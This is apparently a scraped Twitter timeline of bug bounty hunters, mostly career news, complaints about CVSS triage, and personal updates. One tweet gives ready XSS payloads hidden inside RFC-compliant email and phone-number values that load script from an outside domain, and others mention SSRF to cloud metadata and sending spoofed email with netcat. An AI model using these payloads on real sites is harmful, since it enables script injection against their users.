plenum 🇹🇳

I just published Identifying and Exploiting Unsafe Deserialization in Ruby XMLRPC link.medium.com/tc9mOBQlUBb

Launching today! Volerion transforms raw CVEs into structured and instant insights #CVE #CyberSecurity #infosec

@NahamSec And then wonder why do I keep doing this to myself

Me: I really need to relax Also me: launches into call of duty warzone

@Blaklis_ @SopraSteriaSecu Félicitations @Blaklis_ j’espère que au moins tu aura une augmentation cette année

@SopraSteriaSecu Comme je n'ai pas de moyen de vous contacter autrement; la prochaine fois, ça serait sympa de *demander* avant d'utiliser l'image de quelqu'un pour faire votre communication. C'est quand même le strict minimum, surtout quand on est une boite de sécu...

@rez0__ Congrats all the best

HUGE personal life update! 💻😊 Yesterday was my last day as a Principal AI Engineer at AppOmni. Today, I'm a full time bug bounty hunter and solo founder. - AppOmni is amazing, and I still support them fully. I was there almost 5 years! - I’m freaking pumped to do full-time bug bounty hacking! It’s fun, challenging, and something I’m really passionate about. - Solo Founder: I'm going to keep building apps (mostly AI-powered) like the hacking-plugin I released a couple weeks ago called Shift. - Podcasting: I'm the new Co-Host of the Critical Thinking Bug Bounty Podcast (@ctbbpodcast)! 🎉 - I'm going to keep blogging and posting to my email list. I’m extremely excited for this next chapter and everything it entails. Links for all the stuff above is in the first reply. Please check out the blog, email list, and discord!

Started using bluesky bsky.app/profile/plenum…

@intigriti Ssrf -> dns rebind -> access to cloud metadata. The rest is history 😁

Happy Halloween 🎃👻 In our final week of our Cybersecurity Awareness Month competition, we want to know... 💻 What SSRF vulnerabilities have you found? 😱 And what impact could they have had if exploited? Head to our Instagram for entry details and competition rules 👇 buff.ly/40nkysd

@ITSecurityguard 🤔

It's lonely at the top 👑 recon-royale.com

@rez0__ Congrats 👏

Small announcement 😊 🎉 I've learned a crazy amount about AI tooling and AI implementation over the last 2 years, so I'm launching an AI consulting side hustle. Naturally I've got a primary strength of hacking/security, but I've been a Principal AI Engineer for the last year and have built multiple AI applications. I've already consulted several companies on the best way to build AI applications that are high quality, fast, and secure. If you're interested, reach out at the site below in the first reply or email joseph@rez0corp.com.

@albinowax @h4x0r_dz Using individual by name is also interesting, to be able to hide all the tracking and unnecessary cookies

@h4x0r_dz Do you want to name individual cookies to hide?

hey @Burp_Suite can you please add an option to customize Uninteresting headers, i want to hide the long cookies from all the requests headers too if you add this option, it will be amazing!

@_godiego__ In the ever evolving landscape of ...

So funny how sometimes you can clearly see something is chatgpt written 😂

@Jhaddix @DanaEpp @rez0__ @Shopify @G0LDEN_infosec Agreed, regardless of the program, things have been piling up for quite some time now, and we have seen this behavior becoming more common. Some reports have been disclosed already where we clearly see triage or vendor giving wrong cvss explanation sometimes totally made up.

its not my bug, and they closed comms with @G0LDEN_infosec even after appeal. How is he supposed to have a convo in private? There's no recourse for him. He happened to mention his frustration in discord. There was a thread in another discord talking about the program in a negative way. So I tweeted. But if i handn't there no options left for him. THEN people came out from everywhere. That's not on me. You are saying i should have back-channled with people i know at the program. I'm saying that bug hunter's shouldnt need a profile like mine to get some help.

Well, this is kind of going bug bounty viral... MULTIPLE DMs on Discord from LEGIT researchers showing me bugs downgraded. Or BS reasons for invalidating. Yikes

You’re routing a bastion. I’m routing the most efficient path to clean up my kids’ toys all over the yard. We are not the same.

@zseano Glad it went good, hope you get well soon buddy

Home sweet home 🙌 very tired & sore! Told me it was severely infected & they were worried it would pop inside me & run risk of sepsis, so I had “emergency surgery”. now the healing begins 🙏 ready for bed 😴😂

Been in hospital since yesterday waiting for surgery on an infected abscess to be removed, getting quite fed up now! so damn hungry. Wish I brought my laptop to do some hacking😴

The new critical content injection, quality over quantity

@ctbbpodcast @domain Fun fact you can actually exploit it the other way around, if the app allows incoming emails and uses/shows the sender field, you can send emails with netcat, although it is tricky to not break SMTP syntax it is still a nice bug medium.com/bugbountywrite…

RFC-compliant payloads to try and put in your username or telephone number fields on your next target: Email: "><img/src/onerror=import('//domain/')>"@domain.com Mobile: 013371337;ext=<img/src/onerror=import('//domain/')>

@_godiego__ AC:H, UI:R

Today, on how to scam hackers, unauthenticated mass PII leak rated Medium cause the data cannot be used to compromise a system 🤡

Are you a hacker ?

I'm buying this one.

CVSS: custom vulnerability scoring system

@renniepak Strange way to say "I'm a cool guy" -_(*.*)_- ok